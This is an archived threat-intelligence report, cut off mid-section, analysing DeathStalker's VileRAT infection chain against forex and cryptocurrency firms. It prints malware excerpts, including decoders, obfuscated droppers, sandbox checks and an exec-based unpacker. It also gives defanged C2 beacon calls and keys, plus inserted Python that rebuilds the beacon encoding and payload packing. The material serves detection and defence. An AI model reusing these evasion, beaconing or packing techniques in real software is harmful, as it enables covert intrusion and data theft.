{
	"id": "0e6aaaaf-a065-4416-af4f-997e33734171",
	"created_at": "2026-04-06T03:35:54.046963Z",
	"updated_at": "2026-04-10T13:12:06.680998Z",
	"deleted_at": null,
	"sha1_hash": "961ec3471b76aebe71c37d7de01be49ce7149179",
	"title": "VileRAT: DeathStalker’s continuous strike at foreign and cryptocurrency exchanges",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 971868,
	"plain_text": "VileRAT: DeathStalker’s continuous strike at foreign and\r\ncryptocurrency exchanges\r\nBy Pierre Delcher\r\nPublished: 2022-08-10 · Archived: 2026-04-06 02:50:53 UTC\r\nIn late August 2020, we published an overview of DeathStalker’s profile and malicious activities, including their Janicab,\r\nEvilnum and PowerSing campaigns (PowerPepper was later documented in 2020). Notably, we exposed why we believe the\r\nthreat actor may fit a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support\r\ncompetitive and financial intelligence efforts.\r\nMeanwhile, in August 2020, we also released a private report on VileRAT to our threat intelligence customers for the first\r\ntime. VileRAT is a Python implant, part of an evasive and highly intricate attack campaign against foreign exchange and\r\ncryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of the Evilnum modus operandi, and\r\nattributed it to DeathStalker. Malicious activities that we associate with DeathStalker’s VileRAT track have been publicly\r\nand partly documented since, without any attribution or under different monikers (Evilnum, PyVil), starting in September\r\n2020, through 2021 and more recently in June 2022.\r\nDeathStalker has indeed continuously leveraged and updated its VileRAT toolchain against the same type of targets since we\r\nfirst identified it in June 2020. While we comprehensively documented the evolution to our threat intelligence customers\r\nrecently, and despite existing public indicators of compromise, we regret to note that the campaign is not only ongoing at the\r\ntime of writing, but also that DeathStalker likely increased its efforts to compromise targets using this toolchain recently. We\r\nhave indeed been able to identify more samples of VileRAT-associated malicious files and new infrastructure since March\r\n2022, which may be a symptom of an increase in compromise attempts. 
We deemed it may be helpful to publicly expose some of our knowledge about VileRAT, to help potential targets better detect and stop such malicious activities.\r\nVileRAT’s initial infection and toolset overview\r\nBack in the summer of 2020, DeathStalker’s VileRAT initial infection consisted of spear-phishing emails sent to foreign exchange companies from fake personas (a fake diamond trading company, for instance) who shared investment interests. Should the target reply and continue the conversation, the fake persona would at some point, upon request, provide a link to a malicious file hosted on Google Drive (a Windows shortcut file masquerading as a PDF, or wrapped in a ZIP archive), presented as identification documents. Opening the shortcut would then trigger the execution of arbitrary system commands, to drop a harmless decoy document as well as a malicious and quite sophisticated binary loader that we dubbed VileLoader.\r\nMore recently, since at least late 2021, the infection technique has changed slightly, but the initial infection vector is still a malicious message: a Word document (DOCX, see Figure 1) is sent to targets via email (either as an attachment or embedded in the email body whenever possible). In July 2022, we also noticed that the attackers leveraged chatbots embedded in targeted companies’ public websites to send malicious DOCX files to their targets.\r\nFigure 1. Malicious DOCX social engineering message\r\nhttps://securelist.com/vilerat-deathstalkers-continuous-strike/107075/\r\nPage 1 of 23\r\nThe DOCX documents are frequently named using the “compliance” or “complaint” keywords (as well as the name of the targeted company), suggesting the attacker is answering an identification request or raising an issue as a pretext for sending them.\r\nThe initial infection and toolset deployment, as we observed them starting in at least late 2021, are schematized below (see Figure 2).\r\nFigure 2. VileRAT infection and toolset overview
A bit of stomping and concealment up to VileDropper\r\nThe initial DOCX infection document itself is innocuous, but it contains a link to another malicious, macro-enabled DOTM document as a “remote template” (see Figure 3). These DOTM files are automatically downloaded by Word when the DOCX is opened, and their embedded macro is triggered if the recipient enabled execution (as requested by the social engineering message, see Figure 1).\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e\r\nFigure 3. Malicious remote template inclusion in infection DOCX\r\nThe malicious DOTM remote templates leverage the VBA stomping technique to conceal the code of an embedded macro. VBA stomping consists of making the editable VBA source code (i.e., the visible code of a macro) differ from the code that will actually be executed. This is possible because both the editable (visible) source code and a compiled internal version of it, called p-code, are embedded in macro-enabled documents, and Office runs the p-code directly when it can. As a result of VBA stomping, the real macro code that will be executed is hidden from standard tools (Microsoft Word’s macro editing tools, but also OLETools). Tools that disassemble the stored p-code rather than the source stream, such as pcodedmp, still reveal it, and a mismatch between the two streams is itself a strong indicator of stomping.\r\nThis technique comes with a drastic limitation: the hidden macro (i.e., internal p-code) can only be executed if the macro-enabled document is opened with the same Office version from which it was generated. Otherwise, the hidden macro cannot run, and the visible one will be executed instead. In this last case, DeathStalker ensured it would result in a popup message to the user (see Figure 4). But most of all, DeathStalker ensured that it distributed several variants of infection documents to their targets, each one being prepared for a specific Office version.\r\nFigure 4. VBA stomping failure in a malicious DOTM remote template
In any case, the visible and hidden macros download a picture to replace the social engineering message in the infection document (see Figure 5) and trick the reader into believing something failed.\r\nFigure 5. Example of a downloaded image upon macro execution\r\nIn the background, however, provided the VBA stomping worked, the DOTM-embedded macro silently gathers information about security products that are installed on the target computer (using WMI), sends it to a command-and-control (C2) server, decodes and drops files, then ultimately executes a malicious obfuscated JavaScript (JS) backdoor we called VileDropper.\r\nThe DOTM-embedded macro itself already reveals some interesting and specific techniques. It is lightly obfuscated, as most text strings are XOR-encoded (see Figure 6) with a password that is derived from a sentence (e.g., “Operates Catholic small towns pueblos Two of”).\r\n' Strings are stored as hex; each byte is XORed with the key character at the same\r\n' position, the key being cycled. decodepassword derives the key from the seed sentence.\r\nFunction decodestring(dt As String) As String\r\n    On Error Resume Next\r\n    Dim ks As String\r\n    ks = decodepassword\r\n    Dim dl As Long\r\n    dl = ((Len(dt) / 2) - 1)   ' number of hex pairs, minus one\r\n    kl = Len(ks)\r\n    Dim s As String\r\n    s = \"\"\r\n    For i = 0 To dl\r\n        Dim c1 As Integer\r\n        Dim c2 As Integer\r\n        c1 = Val(\"\u0026H\" \u0026 Mid(dt, ((i * 2) + 1), 2))   ' hex pair to byte\r\n        c2 = Asc(Mid(ks, (i Mod kl) + 1, 1))            ' key byte, cycled\r\n        s = s \u0026 Chr(c1 Xor c2)\r\n    Next\r\n    decodestring = s\r\nEnd Function\r\nFigure 6. XOR decoding function (renamed for clarity) in DOTM-embedded macro
The XOR decoding algorithm looks very close to the one that was leveraged in VBS loader scripts from the PowerPepper toolchain (see Figure 7) in the past, and the seemingly legitimate function names are also reminiscent of those that were used by PowerPepper macros (e.g., “insert_table_of_figures”, “change_highlight_color”, etc.).\r\n' Same hex/cycling-key XOR, with two quirks: the key is the script’s first command line\r\n' argument, and every \"44f\" in the hex text is rewritten to \"44\" before decoding.\r\nFunction DelPort(GeneralText)\r\n    Dim Argv : Argv = WScript.Arguments(0)\r\n    GeneralText = Replace(GeneralText, \"44f\",\"44\")\r\n    Dim z, i, cvpo, vpcol, sdfiko, gfdvvc, sdfopk\r\n    For i = 1 To Len(GeneralText)\r\n        cvpo = cvpo + 1\r\n        If cvpo \u003e Len(Argv) Then cvpo = 1   ' cycle through the key\r\n        gfdvvc = Asc(Mid(Argv, cvpo, 1))\r\n        If i \u003e Len(GeneralText) \\ 2 Then Exit For   ' one iteration per hex pair\r\n        vpcol = CByte(\"\u0026H\" \u0026 Mid(GeneralText, i * 2 - 1, 2))\r\n        sdfiko = vpcol Xor gfdvvc\r\n        z = z \u0026 Chr(sdfiko)\r\n    Next\r\n    DelPort = z\r\nEnd Function\r\nFigure 7. XOR decoding function in a PowerPepper VBS loader (MD5 DB6D1F6AB887383782E4E3D6E4AACDD0)\r\nThe DOTM-embedded macro decodes and drops two files in the “%APPDATA%” folder (“Redist.txt” and “ThirdPartyNotice.txt”, or “pattern.txt” and “changelog.txt”) out of encoded data that is stored in non-visible TextBox forms (see Figure 8). Leveraging Office object properties as hidden data sources is also something we have previously seen with PowerPepper.\r\nFigure 8. TextBox form used as a data store within malicious DOTM documents, as shown by Microsoft’s VBA editor\r\nAnother notable feature is that the DOTM-embedded macro signals progression or errors during the execution by sending HTTP GET requests to fixed C2 URLs. 
Interestingly, all HTTP requests in the VBA macro are triggered using remote picture insertion functions (see Figure 9).\r\ndoc.Shapes.AddPicture (decodestring(\"09184015545D5B1B1B07501E001F5C4B0D1D5B3B2D3647143422115728383E1D3E2A024B06025B...0F1C02301C4B57743F\r\n' hxxp://hubflash[.]co/HCSqfUN%2FJJnPO49gnojrpDo%2BMxnGrYaL161m49AhAAAA%2FwQ5Tgt6JlNOpWd1chDdUc5MB1HWBB9Yq3EECIbTO8uX\r\nFigure 9. DOTM-embedded macro leverages “AddPicture” as a Web client\r\nIn any case, the DOTM-embedded macro finally triggers VileDropper’s execution, using a renamed copy of the “WScript” interpreter (“msdcat.exe” or “msgmft.exe” in the “%APPDATA%” folder), with a command such as:\r\nmsgmft.exe /E:jScrIpt \"\\changelog.txt\" 91 pattern.txt\r\n“changelog.txt” is VileDropper, “91” is part of the password used by VileDropper to decode XORed data, and “pattern.txt” is an encoded package that contains VileLoader. A renamed script host running out of “%APPDATA%” with an explicit “/E:” engine switch against a “.txt” file is an unusual combination on a workstation, and a convenient detection pivot for this stage.\r\nVileDropper: an overly obfuscated task scheduler\r\nNext in DeathStalker’s intricate VileRAT infection chain comes VileDropper. 
It is an obfuscated JavaScript file that mainly drops and schedules the execution of the next stage: VileLoader.\r\nvar _0x140c9e;//ACCS3\r\n_0x36bbe9: {//ACCS3\r\n    try {//ACCS3\r\n        var _0x527036 = _0x112a30 + '\\x5c' + WScript[_0x1dbcbb(0x38c)](0x1),//ACCS3\r\n            _0x33ee6e = _0x3b3918[_0x4462ad[_0x1dbcbb(0x312)](_0x4459df, _0x4462ad[_0x1dbcbb(0x23d)])](_0x527036, 0x1),//ACCS3\r\n            _0x46efdf = _0x33ee6e[_0x4459df(_0x1dbcbb(0x1e7) + _0x1dbcbb(0x29c))]();//ACCS3\r\n        _0x33ee6e[_0x1dbcbb(0x37a)](), _0x3b3918[_0x1dbcbb(0x38f)](_0x527036), _0x527036 = '';//ACCS3\r\n        for (_0x33ee6e = 0x0; _0x33ee6e \u003c _0x46efdf[_0x1dbcbb(0x2fa)] - 0x2; _0x33ee6e += 0x2)//ACCS3\r\n            _0x527036 += String[_0x1dbcbb(0x259) + 'de'](parseInt(_0x46efdf[_0x1dbcbb(0x2f4)](_0x33ee6e, _0x33ee6e + 0x2), 0x10));//ACCS3\r\n        _0x140c9e = _0x527036;//ACCS3\r\n        break _0x36bbe9;//ACCS3\r\n    } catch (_0x48c9c6) {}//ACCS3\r\n    _0x140c9e = void 0x0;//ACCS3\r\n}//ACCS3\r\nFigure 10. VileDropper code excerpt in its original form
VileDropper needs at least two arguments to run for the first time (a third may be used as a flag to trigger environment-specific execution variations, depending on security products that are installed on targeted computers):\r\nthe first one is a partial password (used to decode XOR-encoded data);\r\nthe second is a path to an encoded payload file (which contains VileLoader and its companion shellcode).\r\nVileDropper also checks its interpreter and file name, to immediately stop execution if it is not called as planned (this is probably done to evade sandboxes), as can be seen in the following deobfuscated code excerpt:\r\n// aWShell1: WScript.Shell object (exposes CurrentDirectory); aAppDataPath1: the expected %APPDATA% path;\r\n// sArgThird1: the optional third argument; aScriptHostFullpath1: path of the running script host\r\nif (aWShell1[\"CurrentDirectory\"][\"toLowerCase\"]() != aAppDataPath1[\"toLowerCase\"]()) {\r\n    WScript[\"Quit\"]();   // not started from %APPDATA%: bail out\r\n}\r\nif (!sArgThird1) {\r\n    if (-0x1 == aScriptHostFullpath1[\"indexOf\"](\"msdcat\")) {\r\n        WScript[\"Quit\"]();   // first run must come from the renamed host \"msdcat\"\r\n    }\r\n} else {\r\n    if (-0x1 == aScriptHostFullpath1[\"indexOf\"](\"cscript\")) {\r\n        WScript[\"Quit\"]();   // a run with the third flag must come from cscript\r\n    }\r\n}\r\nFigure 11. Deobfuscated execution check in VileDropper\r\nVileDropper’s exact execution flow depends on the security products that are installed on the targeted computer, but most of the time, it copies itself to another file, relaunches itself, and deletes its original copy. During execution VileDropper:\r\ngathers additional data on the targeted environment (using WMI), generates a target identifier, and sends them to a C2 server;\r\ndecodes and drops VileLoader and its encoded companion shellcode. 
The file names and location vary depending on samples, but they are placed under a seemingly legitimate common folder in “%APPDATA%” (e.g., “exe” and “dev0Y11ZF.tmp” in “%APPDATA%\\Microsoft\\Printer Settings\\Printers\\”);\r\nschedules a task to run VileLoader 35 to 65 seconds later, then indefinitely every three hours and 45 minutes.\r\nVileDropper sends data to a C2 server using an HTTP GET request to a fixed URL (e.g., “hxxp://hubflash[.]co/admin/auth.php”), using a preset User-Agent (both the C2 URL and the User-Agent change depending on VileDropper samples). The useful information is stored as a JSON document, which is then XOR-encoded, base64-encoded, URL-encoded, and set as a cookie value in the HTTP request:\r\nJSON key  Content (JSON value)\r\nu  A target identifier. The identifier is a custom UUID-like representation of the target’s login (%USERNAME% environment variable) and computer UUID (as obtained in the first result of the WMI query: SELECT UUID FROM Win32_ComputerSystemProduct). 
This UUID-like value is then base64-encoded and URL-encoded. Due to fixed lengths and padding from the identifier generation logic, the identifier’s final form is always 48 characters long.\r\nd  A hard-coded VileDropper identifier, which might designate a campaign or version (e.g., “9745B355”).\r\na  A list of the names of the security products (AntiVirusProduct in WMI) that are installed on the target computer, separated by the pipe sign (|), then XORed, base64-encoded and URL-encoded.\r\nn  The target’s fully qualified login, as the shell expansion of “%USERDOMAIN%\\%USERNAME%”, which is then XORed, base64-encoded and URL-encoded.\r\nw  The target’s operating system version, as returned from the WMI query SELECT Version FROM Win32_OperatingSystem, then base64-encoded and URL-encoded.\r\nThe task that is scheduled by VileDropper (whose name varies depending on samples, e.g., “CDS Sync” or “UpdateModel Task”) triggers the following type of execution command:\r\n%APPDATA%\\Microsoft\\Printer Settings\\Printers\\FWDeviceEnabler.exe \"[u]\" \"\" \"[a]\" \"[w]\" 0 \"[d]\" \"[n]\"\r\nThe characters between square brackets (such as [u]) in the command line designate the content of the corresponding JSON key (i.e., [u] is the encoded target identifier).\r\nA XORing interlude\r\nBefore moving on to VileLoader, a note on the XOR encoding scheme that is leveraged by VileDropper to protect data sent to the C2 server, as similar schemes will be used further on. The algorithm generates data blobs that are laid out as follows (then sometimes further base64-encoded and URL-encoded):\r\nType A:\r\n[XOR key (6 random bytes)][XOR-encoded data]\r\nThe resulting blobs are self-sufficient and can be decoded by the recipient (as well as any third party…) without any access to the pre-shared key. In practice, this means that a cookie value captured in a proxy log is enough to recover the beacon content offline. 
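The XOR layers met so far, reimplemented in Python as an added example (this is not code from the article nor from the malware): the hex-string scheme of Figures 6 and 7 with PowerPepper’s “44f” rewrite as an option, the Type A blob with its embedded six-byte key, and the JSON-to-XOR-to-base64-to-URL wrapping of VileDropper’s beacon cookie, including the masking of the embedded key with a script password that VileDropper applies to its own obfuscated strings. The masking is assumed to be a byte-wise XOR of the key with the cycled password (the page does not detail it), the real password is not reproduced, the u identifier is a constructed stand-in, and all sample values are constructed.

```python
import base64
import json
import os
import urllib.parse

# 1. Hex-string XOR of the DOTM macro (Figure 6) and the PowerPepper VBS loader (Figure 7).
# Each plaintext byte is XORed with the key character at the same position, the key cycling.

def encode_hex_xor(plaintext: str, key: str) -> str:
    kb, pt = key.encode('latin-1'), plaintext.encode('latin-1')
    return bytes(b ^ kb[i % len(kb)] for i, b in enumerate(pt)).hex().upper()

def decode_hex_xor(hex_text: str, key: str, powerpepper_quirk: bool = False) -> str:
    if powerpepper_quirk:
        hex_text = hex_text.replace('44f', '44')   # Replace(GeneralText, '44f', '44') in Figure 7
    kb = key.encode('latin-1')
    data = bytes.fromhex(hex_text)
    return bytes(b ^ kb[i % len(kb)] for i, b in enumerate(data)).decode('latin-1')

# 2. Type A blob: [6 random key bytes][data XOR key]. The key ships inside the blob, so
# anyone holding the blob can decode it. VileDropper hides the key of its own obfuscated
# strings by XORing it with a script-specific password (assumption: applied byte-wise,
# password cycled; the real password is not on the page).
KEY_LEN = 6

def xor_stream(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def encode_type_a(data: bytes, password: bytes = b'', key: bytes = None) -> bytes:
    key = key or os.urandom(KEY_LEN)
    stored_key = xor_stream(key, password) if password else key
    return stored_key + xor_stream(data, key)

def decode_type_a(blob: bytes, password: bytes = b'') -> bytes:
    stored_key, body = blob[:KEY_LEN], blob[KEY_LEN:]
    key = xor_stream(stored_key, password) if password else stored_key
    return xor_stream(body, key)

# 3. Beacon wrapping: Type A XOR, then base64, then URL-encoding. VileDropper applies it
# to the a and n values and again to the whole JSON document placed in the Cookie header.

def wrap(data: bytes, key: bytes = None) -> str:
    return urllib.parse.quote(base64.b64encode(encode_type_a(data, key=key)).decode(), safe='')

def unwrap(text: str) -> bytes:
    return decode_type_a(base64.b64decode(urllib.parse.unquote(text)))

def build_beacon_cookie(target_id: str, dropper_id: str, av_names: list, login: str,
                        os_version: str, key: bytes = None) -> str:
    fields = {
        'u': target_id,                               # constructed stand-in for the 48-char identifier
        'd': dropper_id,
        'a': wrap('|'.join(av_names).encode(), key),  # pipe-separated AntiVirusProduct names
        'n': wrap(login.encode(), key),               # USERDOMAIN-qualified login
        'w': urllib.parse.quote(base64.b64encode(os_version.encode()).decode(), safe=''),
    }
    return wrap(json.dumps(fields, separators=(',', ':')).encode(), key)

def parse_beacon_cookie(cookie_value: str) -> dict:
    # What a defender can do with a captured cookie value: no shared secret is needed.
    fields = json.loads(unwrap(cookie_value))
    return {
        'u': fields['u'],
        'd': fields['d'],
        'a': unwrap(fields['a']).decode().split('|'),
        'n': unwrap(fields['n']).decode(),
        'w': base64.b64decode(urllib.parse.unquote(fields['w'])).decode(),
    }

if __name__ == '__main__':
    cookie = build_beacon_cookie('AAAA', '9745B355', ['Windows Defender', 'ESET Security'],
                                 'CORP-alice', '10.0.19044')
    print(cookie)
    print(parse_beacon_cookie(cookie))
```

parse_beacon_cookie is the part worth keeping in a toolbox: feed it the value of the “source” style cookie from a suspicious GET to a fixed php path and it yields the AV list, login and OS version in clear, which is exactly what makes this beacon format weak for the attacker and useful for triage.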
In VileDropper, strings that are encoded as part of the JavaScript obfuscation benefit from an additional XORing step: the XOR key that is embedded in data blobs is additionally XORed with a script-specific fixed password (a part of this fixed password is passed to VileDropper on its execution command line by the previous DOTM macro in the infection chain, the other part is hard-coded in VileDropper itself).\r\nLater, VileLoader and VileRAT use other variants of this algorithm, which produce data blobs laid out as one of the following options:\r\nType B:\r\n[XOR key length (variable)][XOR key (random bytes)][Padding][XOR-encoded data]\r\nType C:\r\n[XOR-encoded data length][XOR-encoded data][XOR key length (variable)][XOR key (random bytes)]\r\nType D:\r\n[XOR key length (variable)][XOR key (random bytes)][XOR-encoded data length][XOR-encoded data]\r\nVileLoader: an evasive multi-stage implant downloader\r\nVileLoader is a remarkable piece of the VileRAT compromise approach. While it has existed since Q2 2020 (it was first publicly documented as dddp.exe), it has been continuously updated and maintained since, and is still deployed from VileDropper at the time of writing. VileLoader’s main goal is to download and execute an additional payload from a C2 server. Though we have only observed it triggering the execution of VileRAT, the loader can technically download and execute other implants.\r\nRecent VileLoader samples are composed of a binary executable (stage 1) and an encoded companion shellcode file (stage 2). Previous samples of VileLoader usually embedded the shellcode within the binary executable directly, and presented themselves as a single monolithic file.\r\nStage 1 – Doctored binary unpacker\r\nVileLoader is initially presented as a binary executable, which carries out the first stage of the execution. 
This binary is always a legitimate one, meticulously doctored by the attackers to integrate a malicious unpacker-type payload. As such, the binary may appear legitimate from a quick automated static code analysis perspective: it includes all the code of a legitimate application (but will not work as expected). This “unpacker” stage is aimed at decoding, loading, and executing the second stage in memory.\r\nVileLoader’s workflow starts by waiting 17 seconds. Then it parses the command line arguments. The command line must include at least five arguments, or VileLoader terminates. In practice, VileDropper usually gives seven arguments to VileLoader, as we have previously described. VileLoader then opens its encoded companion shellcode file (whose name is passed as the second argument to VileLoader, e.g., “devENX1C6SS.tmp”), reads and decodes it (using the Type B XOR algorithm), maps the deobfuscated data in a region with read, write and execute (RWX) permissions, and runs the next stage (stage 2) by starting a new thread. From a detection standpoint, a user-mode process that reads a “.tmp” companion file from under “%APPDATA%”, maps it RWX and starts a thread into it is the behavior to hunt for.\r\nVileLoader’s first stage contains distinctive “signature” techniques that have been stable since the first sample we analyzed in Q2 2020:\r\n“Sleep” and “GetTickCount” Windows API functions are leveraged to generate random waiting delays. Those functions are resolved in an unusual way: by referencing hard-coded offsets from the beginning of the current binary image that point directly to entries in the legitimate executable’s import address table (IAT);\r\nthe unpacking and loading of VileLoader’s encoded companion shellcode file leverages multiple custom-made system call stubs, mimicking the low-level Windows API functions (NTDLL) for different Windows versions: NtOpenFile, NtReadFile, NtAllocateVirtualMemory, NtCreateThreadEx and NtWaitForSingleObject (see Figure 12).\r\nFigure 12. VileLoader’s stage 1 custom-made system call
However, while older samples parsed command line arguments by resolving and calling dedicated Windows API functions (such as “GetCommandLineW”), the recent samples directly read this information from their own PEB (Process Environment Block) structure. This may have been done to better bypass the detection of some security solutions.\r\nStage 2 – In-memory downloader\r\nThe second stage content is extracted from VileLoader’s encoded companion shellcode file, and run by VileLoader’s first stage in memory, in a new thread. From a data perspective, the second stage shellcode (once unpacked by the first stage) is a PE binary that is stripped of its headers and embeds additional encoded data.\r\nThis second stage starts by decoding the required data from its own content (using the Type C XOR algorithm). Some of the decoded data are hash values that were generated with the djb2 algorithm. Those hashes are in turn used to resolve the required function imports through a homebrew IAT: required libraries are loaded, their export tables are parsed, exported function names are hashed with djb2, and the hashes are compared to the hashes that were decoded from internal data. Stage 2 continues by creating a mutex, whose name has been stable since Q2 2020, and which is the same as in VileRAT (“Global\\wU3aqu1t2y8uN”).\r\nFinally, VileLoader’s second stage builds an HTTP GET request that is used to download an implant package. 
In older VileLoader samples, the downloader used a static URL that looked as follows:\r\nhttp://\u003cdomain\u003e/c\u0026v=2\u0026u=\u003cargument 1\u003e\u0026a=\u003cargument 2\u003e\u0026c=\u003cargument 3\u003e\r\nThe only evasion attempt consisted of randomly choosing an HTTP User-Agent header value amongst a fixed list of four. VileLoader used the targeted system’s uptime as a source of “randomness”. In recent samples, the developers tried to improve these evasion techniques, and the HTTP request now looks like this:\r\nGET /administrator/index.php HTTP/1.1\r\nConnection: keep-Alive\r\nAccept-Language: en-US,en;q=0.8\r\nAccept: */*\r\nReferer: http://www.yahoo.com\r\nCookie: source=\u003cencrypted blob\u003e;\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36\r\nHost: corstand[.]com\r\nThe variable parts of this request (highlighted in the original listing) are now chosen at random from a hard-coded list that is decoded from the stage 2 content (using the Type C XOR algorithm). The encrypted blob (cookie value) is initially a JSON dictionary, encrypted with the RC4 algorithm (using the key “BD DE 96 D2 9C 68 EE 06 49 64 D1 E5 8A 86 05 12 B0 9A 50 00 4E F2 E4 92 5C 76 AB FC 90 23 DF C6”, decoded from stage 2 content), XORed (using the Type B XOR algorithm), base64-encoded and URL-encoded. 
The actual JSON content is very similar to the one that is sent by VileDropper to the C2 server (keys marked with ✔️ are taken from the command line arguments provided by VileDropper):\r\nJSON key  Value\r\nv  Hard-coded value (65 in the last sample we analyzed), which might be a version number.\r\nu ✔️  The target identifier.\r\na ✔️  The list of security solutions installed on the targeted computer.\r\nw ✔️  The target’s operating system version.\r\nd ✔️  A fixed identifier, which might designate a campaign or version.\r\nn ✔️  The target’s fully qualified login (%USERDOMAIN%\\%USERNAME%).\r\nr  Flag that indicates whether the mutex creation succeeded (1) or failed (0).\r\nxn  Current process name (e.g., SerenadeDACplApp.exe).\r\ns  Constant value embedded in the code and equal to 0.\r\nThe C2 server then answers in the HTTP response body, with one of the following instructions:\r\ndo nothing: the answer is four null bytes;\r\nimplant package: the answer is an encoded implant package to parse (see below);\r\nsend a screenshot: the answer is a byte of value “1”, followed by three null bytes.\r\nIn older variants, VileLoader’s second stage did not embed the screenshot capability, which was, however, implemented in VileRAT.\r\nIf the C2 server answers with an implant package, it sends a Type D XORed blob. The resulting data is further decompressed using the LZMA1 algorithm, and contains one or several “files” with the following additional metadata:\r\nA CSIDL value, representing the root folder in which the file must be dropped (resolved with the “SHGetFolderPathW” Windows API function);\r\nA subdirectory name;\r\nA file name;\r\nA task name if the file execution is to be scheduled;\r\nThe command-line arguments if the file is to be executed.\r\nIf a specific flag is set in the C2 server response data, VileLoader creates a Windows scheduled task for the last dropped file to set up its persistence. 
The task is created using the ITaskService interface. Finally, the last dropped file is also immediately executed using the “CreateProcessW” Windows API function. It should be noted that some older VileLoader samples executed the downloaded payload in memory, while recent variants tend to drop the downloaded implant on the target’s filesystem.\r\nIf the C2 server requests a screenshot, then VileLoader stage 2 sends an HTTP POST request with a cookie whose value is a XORed (Type B algorithm) JSON dictionary containing the following fields:\r\nJSON key  Value\r\nu  Target identifier.\r\nsc  Constant value (1).\r\ndt  Screenshot timestamp (in the format “YYYY-MM-DD HH:MM:SS”).\r\nThe associated HTTP POST body data is an encoded (using the Type B XOR algorithm) JPEG screenshot.\r\nVileRAT – A super-packed yet still overweight Python implant\r\nVileRAT is the last known stage of the intricate eponymous infection chain from DeathStalker. It is an obfuscated and packed Python3 RAT, bundled as a standalone binary with py2exe. We first discovered it in Q2 2020, and it has also subsequently been named PyVil by other vendors.\r\nA note on VileRAT’s seniority\r\nThe Python library (DLL) that is embedded in a py2exe-bundled binary usually comes from an official Python release. While analyzing VileRAT samples, we noticed that its Python DLL is a custom compilation of Python 3.7 sources: the DLL version is tagged as “heads/3.7-dirty”[1] (instead of “tags/v3.7.4” for an official release, for instance) and references a shortened Git commit ID of “0af9bef61a”. This shortened commit ID matches one in the source code repository of the 3.7 branch of the standard CPython implementation, which is dated to 2020-05-23. 
Due to this commit date, and considering the fact that we first discovered VileRAT in Q2 2020, we believe with medium to high confidence that VileRAT was first packaged for deployment in June 2020.\r\nUnpacking VileRAT\r\nWhen we first encountered VileRAT, we noticed that all the usual decompiling tools for Python3 (uncompyle6, decompyle3 and unpyc37, to name just a few) failed to correctly retrieve a Python source from the VileRAT bytecode. Some of our industry peers had the same issue when they encountered it as PyVil.\r\nLong story short: the first stage of VileRAT has been obfuscated at the Python bytecode level, with the intention of breaking existing decompilers (see Figure 13). The bytecode is obfuscated by:\r\nadding multiple operations that do not have any effect when executed (neutral operations) and useless data;\r\nadding confusing branching and exception handlers;\r\ninserting invalid bytecode in sections that will never be reached during execution (but that decompilers still try, and fail, to decompile).\r\nFigure 13. VileRAT’s first stage Python bytecode, in its original form (left) and deobfuscated form (right). The only useful instructions of this excerpt are highlighted in red.\r\nOnce cleaned at the bytecode level, the first stage of VileRAT unpacking can be properly decompiled as Python code (indentation, lost in extraction, restored below; the base64 payload is omitted as in the original listing):\r\nimport sys\r\nimport zlib\r\nimport base64\r\nT8 = base64.b64decode\r\ny6 = zlib.decompress\r\nm5 = T8(b'')\r\nk9 = bytearray(m5)\r\nY7 = bytearray(b'0sMIsDYmkeST5ZJHOfHkwmrA5JGVmpBbpKeA')   # XOR key\r\nN2 = bytearray(len(k9)*bytes([0]))\r\nj = 0\r\ncode_length = int(len(k9)/5)   # only the first fifth of the payload is transformed\r\nfor i in range(code_length):\r\n    if i % 3 == 0:\r\n        N2[i] = k9[i] ^ Y7[j]   # every third byte is XORed with the cycling key\r\n    else:\r\n        N2[i] = k9[i]\r\n    if j + 1 == len(Y7):\r\n        j = 0\r\n    j += 1\r\nN2[i:] = k9[i:]   # remainder copied as is (from the last loop index, not from code_length)\r\nexec(y6(N2))   # zlib-decompress the result and run it as the next layer\r\nVileRAT embeds no less than three layers of unpacking. 
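The stage-1 transform above, rewritten as an added example (not the article’s listing nor the malware’s code) so that the next layer is returned for inspection instead of being handed to exec(). It keeps the listing’s quirks: only the first fifth of the payload is touched, every third byte of it is XORed with the cycling key, the key index restarts at 1 rather than 0 after a wrap, and the untouched tail is copied from the last loop index, which leaves the last byte of the transformed region as is. pack_stage1 is the inverse, written only to build constructed test input; the key is the one from the listing.

```python
import base64
import zlib

KEY = b'0sMIsDYmkeST5ZJHOfHkwmrA5JGVmpBbpKeA'   # key from the decompiled stage-1 listing

def next_key_index(j: int, key_len: int) -> int:
    # The listing resets j to 0 when j + 1 == len(key) and then still increments it,
    # so after each wrap the index restarts at 1: key[0] is only used for the first byte.
    if j + 1 == key_len:
        j = 0
    return j + 1

def transform(buf: bytearray, key: bytes) -> bytearray:
    # Shared by unpack and pack (XOR is its own inverse): every third byte within the
    # first fifth of buf is XORed with the cycling key; everything else is left alone.
    out = bytearray(buf)
    code_length = len(buf) // 5
    j = 0
    for i in range(code_length):
        if i % 3 == 0:
            out[i] = buf[i] ^ key[j]
        j = next_key_index(j, len(key))
    # N2[i:] = k9[i:] runs with i == code_length - 1, so that byte is copied untouched.
    last = max(code_length - 1, 0)
    out[last:] = buf[last:]
    return out

def unpack_stage1(encoded: bytes, key: bytes = KEY) -> bytes:
    # base64 -> XOR layer -> zlib; returns the next layer's source instead of exec()ing it.
    return zlib.decompress(bytes(transform(bytearray(base64.b64decode(encoded)), key)))

def pack_stage1(source: bytes, key: bytes = KEY) -> bytes:
    # Inverse of unpack_stage1, used here only to build a constructed payload.
    return base64.b64encode(bytes(transform(bytearray(zlib.compress(source)), key)))

if __name__ == '__main__':
    payload = pack_stage1(b'print(1)')   # constructed next layer, not a real sample
    print(unpack_stage1(payload))
```

Writing the recovered layer to disk and repeating the process on it is how the remaining layers are peeled; the point of returning bytes rather than executing them is that each layer can be inspected, hashed and compared across samples before anything runs.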
